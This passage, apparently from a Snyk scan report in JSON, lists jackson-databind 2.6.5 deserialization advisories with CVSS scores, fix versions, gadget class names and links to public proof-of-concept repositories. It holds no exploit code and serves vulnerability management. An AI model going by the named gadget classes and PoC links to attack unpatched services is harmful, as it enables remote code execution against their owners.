"ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2634", - "title": "Github Issue #1" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2631", - "title": "GitHub Issue #2" - }, - { - "url": "https://github.com/fairyming/CVE-2020-9548", - "title": "GitHub PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.016713Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", - "epssDetails": { - "percentile": "0.79604", - "probability": "0.00652", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9546", - "CVE-2020-9547", - "CVE-2020-9548" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5p34-5m6p-p58g", - "GHSA-p43x-xfjf-5jhr", - "GHSA-q93h-jc49-78gg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-02T10:29:31.222015Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T05:18:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T05:18:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.132894Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Pedro Sampaio" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.3", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2462", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2469", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", - "title": "RedHat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.772859Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", - "epssDetails": { - "percentile": "0.73523", - "probability": "0.00392", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14892", - "CVE-2019-14893" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cf6r-3wgc-h863", - "GHSA-qmqc-x3r4-6v39" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-03T08:13:33.357434Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T17:09:34Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T17:09:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.500842Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2660", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVE's Blog" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-10673", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.907430Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10673" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fqwf-pjwf-7vqv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T14:36:02.644920Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:21Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.167932Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2659", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVEs: Don’t Panic" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:35.299190Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10672" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-95cm-88f5-f2c7" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T15:03:20.847507Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:24Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.920721Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2642", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 